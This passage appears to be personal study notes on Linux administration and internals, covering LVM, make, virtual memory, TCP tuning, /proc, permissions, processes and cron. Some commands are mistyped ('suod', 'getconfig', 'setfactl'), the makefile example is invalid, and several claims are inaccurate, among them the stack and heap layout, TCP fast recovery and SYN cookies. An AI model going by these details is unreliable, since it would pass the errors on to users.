      • sudo lvresize --resizefs --size 3G my_vol\partition1
      • XFS file system shrinking is not supported
  • If you forget what commands to use for LVM, simply open the man pages for LVM and scroll to the bottom to get a list of available commands

    • man lvm
  • sudo lvmdiskscan will show what disks are available

  • To create a physical volume:

    • sudo pvcreate /dev/sdd /dev/sde /dev/sdf
    • Example:
      [azureadmin@centos01 shares]$ sudo pvcreate /dev/sdd /dev/sde
      Physical volume "/dev/sdd" successfully created.
      Physical volume "/dev/sde" successfully created.
      
    • To list physical volumes: sudo pvs
      [azureadmin@centos01 shares]$ sudo pvs
      PV         VG Fmt  Attr PSize PFree
      /dev/sdd      lvm2 ---  5.00g 5.00g
      /dev/sde      lvm2 ---  5.00g 5.00g
      
    • After creating the physical volume, add it to a volume group:
      • sudo vgcreate my_volume /dev/sdd /dev/sde
    • List volume groups:
      [azureadmin@centos01 shares]$ sudo vgs
      VG        #PV #LV #SN Attr   VSize VFree
      my_volume   2   0   0 wz--n- 9.99g 9.99g
      
    • To expand a volume group, add a PV. Then use vgextend to add the PV to the volume group
      • sudo vgextend my_volume /dev/sdf
    • You can also remove a physical volume from the volume group:
      • sudo vgreduce my_volume /dev/sdf
    • Then you can remove the physical volume:
      • sudo pvremove /dev/sdf
    • Logical volumes are like partitions
    • you can create a new logical volume:
      • sudo lvcreate --size 3G --name partition1 my_volume
    • To grow a logical volume to use all the space it has available
      • suod lvresize --extents 100%VG my_volume/partition1

Device Mapper

  • The kernel uses a driver called the device mapper to route requests for a location on a logical volume’s block device to the true location on an actual device. After LVM has determined the structure of the logical volumes from all of the headers on the PVs, it communicates this the kernel’s device mapper driver in order to initialize the block devices for the logical volumes and load their mapping tables. It achieves this with the ioctl(2) syscall on the /dev/mapper/control device file
  • To get an inventory of mapped devices currently serviced by the device mapper, use dmsetup:
    • dmsetup info
  • There is a header at the beginning of every LVM PV that identifies the volume as well as it’s volume groups and the logical volumes within.
    • You can view the lvm header on a physical volume using dd:
      • dd if=<path to pv> count=1000 | strings | less
      • Example: dd if=/dev/sdb1 count=1000 | strings | less

make

The basic idea behind make is the target, a goal that you want to achieve.

  • A target can be a file or a label.
  • Targets can have dependencies. To build a target, make follows rules.

A simple makefile

# object files
OBJS=aux.o main.o
$myVar="building..."

all: myprog

myprog:
  echo $myVar
  $(OBJS)
  $(CC) -o myprog $(OBJS)

In the example above, the # in the first line denotes a comment. The second line is a macro definition that sets the OBJS variable to two file names. all is the first target. Macros are different from variables. Macro’s do not change after make has started building a target, variables can change. Variables begin with a $. The first target is always the default. The default target is used when you run make on the command line with no targets specified. The rule for building a target comes after the “:”. make is very strict about tabs!

memory

The CPU has a memory management unit (MMU) to add flexibility in accessing memory. The kernel assists the MMU by breaking down the memory used by a process into chunks called ‘pages’. The kernel maintains a data structure, called a ‘page table’, that maps a process’s virtual page addresses into real page addresses in memory. As a process accesses memory, the MMU translates the virtual addresses used by the process into real addresses based on the kernel’s page table.

A user process doesn't need all of it's memory to be immediately available in order to run. The kernel general loads and allocates pages as a process needs them; this system is known as on-demand paging or just demand paging. Let's see how a program starts and runs as a new process:

1) The kernel loads the beginning of the program's instruction code into memory pages. 2) Th ekernel may allocate some working-memory pages to the new process 3) As the process runs, it may determine that the next instruction in code isn't in any of the memory pages that the kernel loaded initially. At this point, the kernel will take over and load the necessary page into memory, and then lets the program resume execution.

You can get a system's page size by looking at the kernel configuration:

getconfig PAGE_SIZE
4096

Page Faults

If a memory page isn't ready when a process wants to use it, the process triggers a page fault. If a page fault occurs, the kernel takes control of the CPU from the process in order to get the page ready. There are two kinds of page faults, major and minor.

Minor page faults occur when the page is in main memory, but the MMU doesn't know where it is. A major page fault occurs when the desired memory page isn't in main memory at all, which means that the kernel must load it from disk or some other slow storage media. Major page faults will bog down a system. Some major page faults are unavoidable, like when the system loads the code from disk when running a program for the first time.

You can drill down to the page faults for individual processes by using the top, ps, and time commands. You’ll need to use the system version of time for this.

ryan:todo/  |main ?:3 ✗|$ /usr/bin/time cal > /dev/null
0.00user 0.00system 0:00.00elapsed 100%CPU (0avgtext+0avgdata 2824maxresident)k
0inputs+0outputs (0major+130minor)pagefaults 0swaps

As you can see in the output above, there were 0 major page faults and 130 minutes page faults when running the cal program.

Virtual Memory

  • The OS’s process abstraction provides each process with a virtual memory space. Virtual memory is an abstraction that gives each process its own private, logical address space in which its instructions and data are stored. Each process’s virtual address space can be thought of as an array of addressable bytes from 0 up to some maximum address. Processes cannot access the contents of one another’s address spaces.

  • Operating systems implement virtual memory as part of the lone view abstraction of processes. That is, each process only interacts with memory in terms of its own virtual address space rather than the reality of many processes sharing the computers RAM simultaneously.

  • A process’s virtual address space is divided into several sections, each of which stores a different part of the process’s memory. The top part is reserved for the OS and can only be accessed in kernel mode. The text and data parts of a process’s virtual addresss space are initialized from the program executable file. The text section contains the program instructions, and the data section contains global variables. The stack and heap sections vary in size as the process runs. Stack space grows in response to the process making function calls, and shrinks as it returns from the function calls. Heap space grows when the process dynamically allocates memory space (via calls to malloc), and shrinks when the process frees memory space (with calls to free). The heap and stack portions of a process’s memory are typically located far apart in its address space to maximize the amount of space either can use. Typically, the stack is located at the bottom of a process’s address space and grows upward. The heap is located at the top of the stack and grows downward.

    --------------------------------
    |            OS Code           |
    --------------------------------
    |       Application Code       |
    --------------------------------
    |      Data (Global Vars)      |
    --------------------------------
    |             Heap             |
    |             ⌄⌄⌄⌄             |
    |                              |
    |                              |
    --------------------------------
    |                              |
    |                              |
    |            ^^^^^             |
    |            Stack             |
    --------------------------------
    
  • A page fault occurs when a process tries to access a page that is not currently stored in RAM. The opposite is a page hit. To handle a page fault, the OS needs to keep track of which RAM frames are free so that it can find a free frame of RAM into which the page read from disk can be stored.

  • Page Table Entries (PTE) include a dirty bit that is used to indicate if the in-RAM copy of the page has been modified.

Memory Addresses

  • Because processes operate within their own virtual address spaces, operating systems must make an important distinction between two types of memory addresses. Virtual addresses refer to storage locations in a processes virtual address space, and physical addresses refer to a location in RAM.
  • At any point in time, the OS stores in RAM the address space contents of many processes as well as OS code that it may map into every process’s virtual address space.

Virtual Memory and Virtual Addresses

  • Virtual memory is the per-process view of its memory space, and virtual addresses are addresses in the process’s view of its memory. If two processes run the same binary executable, then they have will have the exact same virtual addresses for function code and for global variables in the address spaces.
  • Processors generally provide some hardware support for virtual memory. An OS can make use of this hardware support for virtual memory to perform virtual to physical address translation quickly, avoiding having to trap to the OS to handle every address translation.
  • The memory management unit (MMU) is the part of the computer hardware that implements address translation. At it’s most complete, the MMU performs full translation.

Paging

  • Although many virtual memory systems have been implemented over the years, paging is now the mostly widely used imlementation of virtual memory.
  • In a Paged virtual memory system, the OS divides the virtual address space of each process into fixed-sized chunks called pages. The OS defines the page size for the system. Page sizes of a few kilobytes are commonly used in general purpose operating systems today. 4 KB is the default page size on many systems.
  • Physical memory is similarly divided into page-sized chunks called frames. Because pages and frames are defined to be the same size, any page of a process’s virtual memory can be stored in any frame of physical RAM.

Virtual and Physical Addresses in Paged Systems

  • Paged virtual memory systems divide the bits of a virtual address into two parts; the high-order bits specify the page number on which the virtual address is stored, and the low-order bits correspond to the byte offset within the page (which byte from the top of the page corresponds to the address).
  • Similarly, paging systems divide physical addresses into two parts; the high-order bits specify the frame number of physical memory, and the low-order bits specify the byte offset within the frame. Because frames and pages are the same size, the byte offset bits in a virtual address are identical to the byte offset bits in its translated physical address. Virtual addresses differ from their translated physical addresses in their high-order bits, which specify the virtual page number and the physical frame number.

Page tables

  • Because every page of a processes virtual memory space can map to a different frame of RAM, the OS must maintain mappings for every virtual page in the process’s address space. The OS keeps a per-process page table that it uses to store the process’s virtual page number to physical frame number mappings.

Translation Look-aside Buffer (TLB)

  • Although paging has many benefits, it also results in a significant slowdown to every memory access. In a paged virtual memory system, every load and store to a virtual memory address requires two RAM accesses; the first reads the page table entry (PTE) to get the frame number for virtual-to-physical address translation, and the second reads or writes the byte(s) at the physical RAM address. Thus, in a paged virtual memory system, every memory access is twice as slow as in a sytem that supports direct physical RAM addressing.
  • One way to reduce the additional overhead of paging is to cache page table mappings of virtual page numbers to physical frame numbers. When translating a virtual address, the MMU first checks for the page numbers in the cache. If found, then the page’s frame number mapping can be grabbed from the cache entry, avoiding one RAM access for reading the PTE.
  • A translation look-aside buffer (TLB) is a hardware cache that stores (page number, frame number) mappings. It is a small, fully associative cache that is optimized for fast lookups in hardware. When the MMU finds a mapping in the TLB (a TLB hit), a page table lookup is not needed, and only one RAM access is required to execute a load or store to a virtual memory address.

How Linux Organizes Virtual Memory

UVA (User Virtual Addressing)

KVA (Kernel Virtual Addressing)

How Linux Organizes Physical Memory

At boot, the kernel organizes and partitions RAM into a tree like heirarchy consisting of nodes, zones, and page frames (page frames are physical pages of RAM). The top level of the heirarchy is made up of nodes, which represent a collection of memory that is local to a particular CPU or group of CPUs. Each node contains one or more zones, which are collections of page frames that share similar characteristics. The zones are further divided into page frames, which are the smallest unit of memory that can be allocated by the kernel.

Any processor core can access any physical memory location, regardless of which node it belongs to. However, accessing memory that is local to the core’s node is faster than accessing memory that is located on a different node. This is because local memory access avoids the overhead of traversing interconnects between nodes.

NUMA vs. UMA

Essentially, nodes are data structures that are used to denote and abstract a physical RAM module on the system motherboard and its associated controller chipset. Actual hardware is being abstracted via software. Two types of memory architectures exist, UMA (Uniform Memory Access) and NUMA (Non-Uniform Memory Access).

NUMA

  • In a NUMA architecture, each processor has its own local memory, and accessing local memory is faster than accessing memory that is located on a different node. This is because local memory access avoids the overhead of traversing interconnects between nodes.
  • NUMA architectures are commonly used in high-performance computing systems, where multiple processors are used to perform complex computations. By using NUMA, these systems can achieve better performance and scalability than traditional UMA architectures.
  • NUMA systems must have at least 2 physical memory banks (nodes) to be considered NUMA.
  • One can use the lstopo command to view the NUMA topology of a system. The output will show the number of nodes, the amount of memory in each node, and the CPUs that are associated with each node. hwloc is another tool that can be used to view the NUMA topology of a system. It provides a graphical representation of the system’s hardware topology, including the NUMA nodes and their associated memory and CPUs.
  • The number of zones per node is dynamically determined by the kernel at boot time based on the amount of memory in the node and the system architecture. The kernel typically creates three zones per node: DMA, DMA32, and Normal. The DMA zone is used for memory that is accessible by devices that use direct memory access (DMA), the DMA32 zone is used for memory that is accessible by 32-bit devices, and the Normal zone is used for all other memory. In addition to these standard zones, the kernel may also create additional zones based on the system architecture and configuration. You can view /proc/buddyinfo to see the memory zones and their associated page frames.
λ ch7 (main) $ cat /proc/buddyinfo
Node 0, zone      DMA      0      0      0      0      0      0      0      0      1      1      2
Node 0, zone    DMA32      6      6      8      7      5      6      7      4      8      9    283
Node 0, zone   Normal   3170   7694  10543   8113   5011   1761    552    182     55     66  10595

UMA

  • In a UMA architecture, all processors share the same physical memory, and accessing any memory location takes the same amount of time, regardless of which processor is accessing it.
  • In Linux, UMA systems are treated as NUMA systems with a single node. This means that the kernel still uses the same data structures and algorithms for managing memory, but there is no need to consider the locality of memory access.

Memory Management

  • When you get done using heap memory, it needs to be cleaned up. This can done using a process known as ‘garbage collection’, or manually by the developer when creating the app
  • Implementation of both the stack and heap is usually down to the runtime / OS.
  • There are 2 memory constructs, stack and heap.

Stack:

  • A stack is a structure that represents a sequence of objects or elements that are available in a linear data structure. What does that mean? It simply means you can add or remove elements in a linear order. This way, a portion of memory that keeps variables created can function temporarily.
  • Stored in computer RAM just like the heap.
  • Variables created on the stack will go out of scope and are automatically deallocated.
  • Much faster to allocate in comparison to variables on the heap.
  • Implemented with an actual stack data structure.
  • Stores local data, return addresses, used for parameter passing.
  • Can have a stack overflow when too much of the stack is used (mostly from infinite or too deep recursion, very large allocations).
  • Data created on the stack can be used without pointers.
  • You would use the stack if you know exactly how much data you need to allocate before compile time and it is not too big.
  • Usually has a maximum size already determined when your program starts.
  • A collection of data needed for a single method is called a stack frame

Heap:

  • Stored in RAM just like the stack.
  • In C++, variables on the heap must be destroyed manually and never fall out of scope. The data is freed with delete, delete[], or free.
  • Slower to allocate in comparison to variables on the stack.
  • Used on demand to allocate a block of data for use by the program.
  • Can have fragmentation when there are a lot of allocations and deallocations.
  • In C++ or C, data created on the heap will be pointed to by pointers (from the stack) and allocated with new or malloc respectively.
  • Can have allocation failures if too big of a buffer is requested to be allocated.
  • You would use the heap if you don’t know exactly how much data you will need at run time or if you need to allocate a lot of data.
  • Responsible for memory leaks.

Example:

int foo()
{
  char *pBuffer; //<--nothing allocated yet (excluding the pointer itself, which is allocated here on the stack).
  bool b = true; // Allocated on the stack.
  if(b)
  {
    //Create 500 bytes on the stack
    char buffer[500];

    //Create 500 bytes on the heap
    pBuffer = new char[500];

   }//<-- buffer is deallocated here, pBuffer is not
}//<--- oops there's a memory leak, I should have called delete[] pBuffer;

why would an object be created on the heap or stack?

In computer science, whether an object is created on the heap or the stack depends on several factors, including object size, lifetime, dynamic allocation needs, sharing requirements, and polymorphism.

  1. Object size: If the object is small, it can be created on the stack, but if it’s large, then it should be created on the heap.
  2. Lifetime: If the object’s lifetime needs to transcend beyond the block/scope where it was created, objects should be created on the heap. Alternatively, If the object’s lifetime is within the context of the block/scope where it was created, objects can be created on the stack.
  3. Dynamic allocation: Heap objects can be allocated dynamically at runtime, while stack objects need to be allocated at compile time.
  4. Sharing: Heap objects can be shared between multiple threads, while stack objects are local to a single thread.
  5. Polymorphism: Creating objects on the heap allows for polymorphism, where objects of different derived classes can be referenced using a base class pointer.

network manager

  • You can use nm-online to check connectivity status
  • The configuration directory for network manager is at /etc/networkmanager with the main configuration file being NetworkManager.conf

Networking

TCP

Connections with TCP are established with a 3-way handshake (SYN-SYNACK-ACK)

Performance

TCP can provide a high rate of throughput even on a high-latency network, by using buffering and a sliding window. TCP also employs congestion control and a congestion window set by the sender, so that it can maintain a high but also reliable rate of transmission across different and varying networks. Congestion control avoids sending too many packets, which could cause congestion and a performance breakdown.

The following is a summary of TCP performance features:

  • Sliding window: This allows multiple packets up to the size of the window to be sent on the network before acknowledgements are received, providing high throughput even on high-latency networks. The size of the window is advertised by the receiver to indicate how many packets it is willing to receive at that time.
  • Congestion Avoidance: To prevent sending too much data and causing saturation, which can cause packet drops and worse performance.
  • Slow-start: Part of TCP congestion control, this begins with a small congestion window and then increases it as acknowledgements are received within a certain time. When they are not, the congestion window is reduced.
  • Selective acknowledgements (SACKs): Allow TCP to acknowledgement discontinuous packets, reducing the number of retransmits required.
  • Fast retransmit: Instead of waiting on a timer, TCP can retransmit dropped packets based on the arrival of duplicate acks. These are a function of round-trip time and not the typically much slower timer.
  • Fast recovery: This recovers TCP performance after detecting duplicate ACKs, by resetting the connection to perform slow-start.
  • TCP Fast open: Allows a client to include data in a SYN packet, so that the server request processing can begin earlier and not wait for the SYN handshake (RFC7413). THis can use a cryptographic cookie to auth the client.
  • TCP timestamps: Includes a timestamp for sent packets that is returned in the ACK

Congestion avoidance

Routers, switches, hosts, may drop packets when overwhelmed. There are many mechanisms to avoid these problems:

  • Ethernet: Pause Frames
  • IP: Explicit Congestion Notification (ECN) field
  • TCP: Congestion Window

Jumbo Frames

The confluence of two components has interfered with the adoption of jumbo frames: older hardware and misconfigured firewalls. Older hardware that does not support jumbo frames can either fragment the packet using the IP protocol (causing a performance cost for packet reassembly), or respond with an ICMP “Can’t Fragment” error. Misconfigured firewalls (as a response to an attack known as ‘the ping of death’) have been configured by administrators to block all ICMP traffic.

Latency

Latency can occur at various layers of the HTTP request pipeline:

  • DNS lookup Latency
  • Connection Latency
  • First-byte latency
  • Round-trip time (network latency)
  • Connection Life Span (keepalives or a lack-of)

Buffering

TCP employs buffering, along with a sliding send window, to improve throughput. Network sockets also have buffers, and applications may also employ their own, to aggregate data before sending.

Buffering can also be performed by external network components, such as switches and routers, in an errot to improve their own throughput. Unfortunately, the use of large buffers on these components can lead to bufferbloat, where packets are queued for long intervals. This causes TCP congestion avoidance on the hosts, which throttles performance. Features have been added to Linux 3.x kernels to address this problem (including byte queue limits, the CoDel queueing discipline, and TCP small queues).

The function of buffering may be best served by the endpoints - the hosts - and not the intermediate network nodes.

Connection Backlog

Another type of buffering is for the initial connection requests. TCP implements a backlog, where SYN requests can queue in the kernel before being accepted by the user-land processes. When there are too many TCP connection requests for the process to accept in time, the backlog reaches a limit and SYN packets are dropped, to be later retransmitted by the client. The retransmission of these packets causes latency for the client connect time. The limit is tunable: it is a parameter of the listen syscall, and the kernel may also provide system-wide limits.

Backlog drops and retransmits are indicators of host overload.

Connection Queues in the Linux Kernel

The kernel employs 2 connection queues to handle bursts of inbound connections:

  • One for incomplete connections (the SYN backlog)
  • One for established connections (the LISTEN backlog)

Only one queue was used in earlier versions of the kernel and it was subject to SYN floods

The use of SYN cookies bypasses the first queue, as they show the client is already authenticated.

The length of these queues can be tuned independently. The LISTEN queue can also be set by the application as the backlog argument to the LISTEN syscall

Segmentation Offload

Network devicesa and networks accept packet sizes up to a maximum segment size (MSS) that may be as small as 1500 bytes. To avoid the network stack overheads of sending many small packets, Linux also uses Generic Segmentation Offload to send packets up to 64 kbytes in size (super packets), which are split into MSS-sized segments just before delivery to the network device. If the NIC and driver support TCP segmentation offload (TSO), GSO leaves splitting to the device, improving network stack throughput.

Tools:

netstat ping ip ss nicstat tcplife tcptop tcpdump / wireshark perf

Linux Observability Sources

These interfaces provide the data for observability tools on Linux:

/proc - per-process counters /proc, ‘sys’ - system-wide counters /sys - device configuration and counters /sys/fs/cgroup - cgroup statistics ptrace - per-process tracing perf_event - Hardware counters (PMCs) netlink - network statistics libpcap - network packet capture

Various files are provided in /proc for per-process statistics. Here is an example of what may be available for a given PID:

All examples using /proc/18

[root@docker01 ~]# ll /proc/18
dr-xr-xr-x. 2 root root 0 Jan  9 09:24 attr
-rw-r--r--. 1 root root 0 Jan  9 09:24 autogroup
-r--------. 1 root root 0 Jan  9 09:24 auxv
-r--r--r--. 1 root root 0 Jan  9 09:24 cgroup
--w-------. 1 root root 0 Jan  9 09:24 clear_refs
-r--r--r--. 1 root root 0 Jan  7 14:05 cmdline
-rw-r--r--. 1 root root 0 Jan  9 09:24 comm
-rw-r--r--. 1 root root 0 Jan  9 09:24 coredump_filter
-r--r--r--. 1 root root 0 Jan  9 09:24 cpu_resctrl_groups
-r--r--r--. 1 root root 0 Jan  9 09:24 cpuset
lrwxrwxrwx. 1 root root 0 Jan  9 09:24 cwd -> /
-r--------. 1 root root 0 Jan  9 09:24 environ
lrwxrwxrwx. 1 root root 0 Jan  9 09:24 exe
dr-x------. 2 root root 0 Jan  7 14:06 fd
dr-x------. 2 root root 0 Jan  9 09:24 fdinfo
-rw-r--r--. 1 root root 0 Jan  9 09:24 gid_map
-r--------. 1 root root 0 Jan  9 09:24 io
-r--r--r--. 1 root root 0 Jan  9 09:24 limits
-rw-r--r--. 1 root root 0 Jan  9 09:24 loginuid
dr-x------. 2 root root 0 Jan  9 09:24 map_files
-r--r--r--. 1 root root 0 Jan  9 09:24 maps
-rw-------. 1 root root 0 Jan  9 09:24 mem
-r--r--r--. 1 root root 0 Jan  9 09:24 mountinfo
-r--r--r--. 1 root root 0 Jan  9 09:24 mounts
-r--------. 1 root root 0 Jan  9 09:24 mountstats
dr-xr-xr-x. 7 root root 0 Jan  9 09:24 net
dr-x--x--x. 2 root root 0 Jan  7 15:26 ns
-r--r--r--. 1 root root 0 Jan  9 09:24 numa_maps
-rw-r--r--. 1 root root 0 Jan  9 09:24 oom_adj
-r--r--r--. 1 root root 0 Jan  9 09:24 oom_score
-rw-r--r--. 1 root root 0 Jan  9 09:24 oom_score_adj
-r--------. 1 root root 0 Jan  9 09:24 pagemap
-r--------. 1 root root 0 Jan  9 09:24 patch_state
-r--------. 1 root root 0 Jan  9 09:24 personality
-rw-r--r--. 1 root root 0 Jan  9 09:24 projid_map
lrwxrwxrwx. 1 root root 0 Jan  9 09:24 root -> /
-rw-r--r--. 1 root root 0 Jan  9 09:24 sched
-r--r--r--. 1 root root 0 Jan  9 09:24 schedstat
-r--r--r--. 1 root root 0 Jan  9 09:24 sessionid
-rw-r--r--. 1 root root 0 Jan  9 09:24 setgroups
-r--r--r--. 1 root root 0 Jan  9 09:24 smaps
-r--r--r--. 1 root root 0 Jan  9 09:24 smaps_rollup
-r--------. 1 root root 0 Jan  9 09:24 stack
-r--r--r--. 1 root root 0 Jan  7 14:05 stat
-r--r--r--. 1 root root 0 Jan  9 09:24 statm
-r--r--r--. 1 root root 0 Jan  7 14:05 status
-r--------. 1 root root 0 Jan  9 09:24 syscall
dr-xr-xr-x. 3 root root 0 Jan  9 09:24 task
-rw-r--r--. 1 root root 0 Jan  9 09:24 timens_offsets
-r--r--r--. 1 root root 0 Jan  9 09:24 timers
-rw-rw-rw-. 1 root root 0 Jan  9 09:24 timerslack_ns
-rw-r--r--. 1 root root 0 Jan  9 09:24 uid_map
-r--r--r--. 1 root root 0 Jan  9 09:24 wchan

The exact list of files depends on the kernel version and CONFIG options. Those related to per-process performance observability include: limits - in-effect resource limits maps - mapped memory regions sched - various CPU scheduler statistics schedstat - CPU runtime, latency, and time slices smaps - mapped memory regions with usage statistics stat - Process status and statistics, including total CPU and memory usage statm - memory usage summary in units of pages status - stat and statm information, labeled fd - directory of file descriptor symlinks cgroup - cgroup memborship information task - directory of per-task statistics

/proc also contains system-wide statistics in these directories:

[root@docker01 proc]# ls -Fd /proc [a-z]*
acpi/      bus/     consoles  devices    driver/      filesystems  iomem    kallsyms  key-users    kpagecount  locks    misc     mtrr          partitions   schedstat  slabinfo  swaps          sysvipc/      tty/     vmallocinfo
asound/    cgroups  cpuinfo   diskstats  execdomains  fs/          ioports  kcore     kmsg         kpageflags  mdstat   modules  net@          /proc/       scsi/      softirqs  sys/           thread-self@  uptime   vmstat
buddyinfo  cmdline  crypto    dma        fb           interrupts   irq/     keys      kpagecgroup  loadavg     meminfo  mounts@  pagetypeinfo  sched_debug  self@      stat      sysrq-trigger  timer_list    version  zoneinfo
  • /proc/cpuinfo

    • Description: Contains information about the CPU such as its type, make, model, number of cores, and processing power.
  • /proc/meminfo

    • Description: Provides details on the system’s memory usage including total and available physical memory, swap space, and various other memory parameters.
  • /proc/loadavg

    • Description: Shows the load average of the system, indicating how busy the system is. Displays averages over 1, 5, and 15 minutes.
  • /proc/uptime

    • Description: Indicates how long the system has been running since its last restart.
  • /proc/mounts

    • Description: Lists all the mounts currently in use by the system, similar to the mount command.
  • /proc/net

    • Description: Contains various network-related information including network configuration, statistics, connections, and more.
  • /proc/partitions

    • Description: Shows the partition table of all the storage devices in the system.
  • /proc/cmdline

    • Description: Displays the parameters passed to the kernel at the time it was started.
  • /proc/version

    • Description: Contains information about the version of the Linux kernel, GCC version used for the kernel build, and the build time.
  • /proc/filesystems

    • Description: Lists all the file systems currently supported by the kernel.
  • /proc/sys

    • Description: Contains a collection of interfaces to query and modify kernel parameters at runtime.

/sys

  • Linux provides a sysfs file system, mounted on /sys, which was introduced with the 2.6 kernel to provide a directory based structure for kernel statistics.
  • Netlink is a special socket address family (AF_NETLINK) for fetching kernel information.
  • To use Netlink, open a socket with the AF_NETLINK address family and then use a series of send(2) and recv(2) calls to pass requests and receiving information in binary structs.
  • The libnetlink library helps with usage.

Tracepoints

  • Tracepoints are a Linux Kernel event source based on static instrumentation.
  • Tracepoints are hard-coded instrumentation points placed at logical locations in kernel code.
  • Available tracepoints can be listed using the perf list tracepoint command
  • Apart from showing when an event happened, tracepoints can also show contextual data about an event.

Pluggable Authentication Modules (PAM)

  • PAM (Pluggable Authentication Modules) is a flexible mechanism for authenticating users and managing authentication-related tasks in Unix-like operating systems.
  • PAM config files are typically stored in /etc/pam.d
  • PAM modules are typically stored in /lib64/security or /lib/security depending on the architecture.
  • PAM configuration files are text files that define how authentication should be handled for various services and applications
  • Each PAM configuration file corresponds to a specific service or application (e.g., login, sshd, sudo) and contains a series of rules that specify which PAM modules to use and how to use them.

Per-Process Analysis

These tools are process oriented and use counters that the kernel maintains Per-Process

  1. ps - show process status, various process statistics, including memory and CPU usage
  2. top - Show top processes, sorted by CPU usage or another statistics
  3. pmap - List process memory segments with usage statistics

These tools typically read statistics from the /proc ephemeral file-system.

Permissions

Every Linux file has a set of permissions that determine who can read, write, or execute the file. Running ls -l displays these permissions.

Only the owner of a file or dir can change permissions (the exception is the super user)

Example:

$ ls -l init
-rwxr-xr-x 1 root root 1440152 May  7  2022 init*

-rw-r–r– 12 root users 12.0K Apr 28 10:10 init* |[-][-][-]- [——] [—] | | | | | | | | | | | | | +———–> 7. Group | | | | | +—————––> 6. Owner | | | | +–––––––––––––> 5. Alternate Access Method | | | +––––––––––––––> 4. Others Permissions | | +—————————––> 3. Group Permissions | +–––––––––––––––––> 2. Owner Permissions +————————————> 1. File Type

  1. File Types:
  • -: regular file
  • d: directory
  • l: symbolic link
  • p: pipe
  • s: socket
  • c: character device
  • b: block device
  1. Permissions can be read, write, or execute for user (#2 in text graphic above) , group (#3 in text graphic above), and others (#4 in text graphic above)

SUID, GID, Sticky Bit Permissions

SUID

  • SUID = Set UserId bit
  • When the SUID bit is set, the file is executed as the owner of the file, rather than the person running that file
$ touch suidfile
$ ls suidfile
suidfile
$ ll suidfile
-rw-rw-r--. 1 azureadmin azureadmin 0 Aug 28 17:46 suidfile
$ chmod 4660 suidfile
$ ls -l suidfile
-rwSrw----. 1 azureadmin azureadmin 0 Aug 28 17:46 suidfile

Find SUID files: find . -perm /4000

SGID

  • File is executed as the owning group of the file, rather than the person running the file
$ touch sgidfile
$ chmod 2440 sgidfile
$ ll sgidfile
-r--r-S---. 1 azureadmin azureadmin 0 Aug 28 17:49 sgidfile

Find GUID Files: find . -perm /2000

Sticky bit

The sticky bit is typically set on public directories to inhibit file erasures by non-owners

ACLs

  • In addition to the standard UGO/RWX permission model, you can also apply ACLs to files and directories
  • ACLs define permissions for named users and named groups
  • ACLs are categorized into two groups, default ACLs and access ACLs
    • Access ACLs are set on individual files and directories
    • Default ACLs can only be applied at the directory level and are inherited by subdirectories and files
  • There are two commands to manage ACLs getfacl and setfacl setfactl -m user:mary:rwx /marysFile

processes

threads

In linux, some processes are divided into pieces called threads. Threads are very similar to processes. They have an identifier, TID (thread Id) and the kernel schedules and runs threads, just like processes. Processes do not usually share memory and I/O connections, threads do. All threads inside a single process share the same system resources.

Many processes have only one thread. A process with only one thread is known to be single-threaded. All processes start out single-threaded. This starting thread is often known as the main thread, and typically corresponds to a 'main' function within a program. This main thread is capable of starting new threads, depending on how the application is written. This is known multi-threading. Threads can run simultaneously on multiple processors/cores, speeding up computation. Threads start faster than processes and communicate more efficiently than processes. This is because threads share memory to communicate amongst themselves, and processes depend on IPC (inter-process communication) calls to communicate.

By default, the output of the `ps` and `top` commands do not show threads, only processes. However, you can modify this behavior:

ryan:// $ ps m |grep httping -A10
1121895 pts/1    -      0:00 httping -delay 2 www.google.com
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -
      - -        Sl+    0:00 -

This is an example of a multi-threaded golang app. The top line with the PID represents the process, and each line below represents a thread within the process.

adjusting process priority

You can change the way the kernel allocates CPU time to a process, relative to other processes. The kernel runs each process according to it's scheduling priority, known as it's `nice` value. This can be a value in range -20 - +19, with -20 being the highest priority. You can see this value for each process using `top` (the PR column). A regular user can only set nice values between 0 and 19, anything below 0 must be set by a superuser. Child processes will inherit the nice value of their parent. Use `ps -l` or `ps -lax` to view the niceness of a process.

use `renice` to change the niceness value of an *existing* process:

[ryan@nebula /]# renice -n 11 83883
83883 (process ID) old priority 10, new priority 11

Context Switching

The OS performs context switching, or swapping process state on the CPU, as the primary mechanism behind multiprogramming (or time sharing). There are two main steps to context switching: 1) The OS Saves the context of the current process running on the CPU, including all of its register values (PC, stack pointers, general purpose registers, condition code, etc.), its memory state, and some other state (open files, etc.) 2) The OS restores the saved context from another process on the CPU and starts the CPU running this other process, continuing its execution from the instruction where it left off.

Process State

In multiprogrammed systems, the OS must track and manage the multiple processes existing in the system at any given time. The OS maintains information about each process, including: 1) The process ID (PID) 2) The address space information for the process 3) The execution state of the process (CPU register values, stack location, etc.) 4) The set of resources allocated to the process (open files) 5) The current process state (ready, running, blocked, exited) 1) Ready - the process could run on the CPU but it is not currently scheduled 2) Running - The process is scheduled on the CPU and is actively executing 3) Blocked - The process is waiting for some event before it can continue being executed (waiting for data to be read from disk, etc.) 4) Exited - The process has exited but has not yet been cleaned up.

Creating Processes

In Unix, the fork system call is used to create a new process. The process calling fork is the parent process and the new process is the child process. When fork() is called, the program must determine if it is the parent or the child process (typically using getpid()), and then determine how to proceed. If you want concurrency in your program, calling fork() is enough. However, to run a different image, the child process must call exec() (or one of it’s variants). After calling fork(), the program counter for both the parent and the child are the same. Once exec() is called, the parent process is wiped from memory of the child process address space.

Process Descriptors

Linux maintains a process descriptor, which is a structure where the linux kernel maintains information about a single process. It contains all the information needed by the scheduler to maintain the process state machine.

Scheduled Tasks

Cron

  • To add a cron job, simply add it to your crontab file by typing crontab in a shell

  • To see an example of a crontab, you can view /etc/crontab

  • Example cronjob structure:

      # Example of job definition:
      # .---------------- minute (0 - 59)
      # |  .------------- hour (0 - 23)
      # |  |  .---------- day of month (1 - 31)
      # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
      # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
      # |  |  |  |  |
      # *  *  *  *  * user-name command to be executed
      17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
      25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
      47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
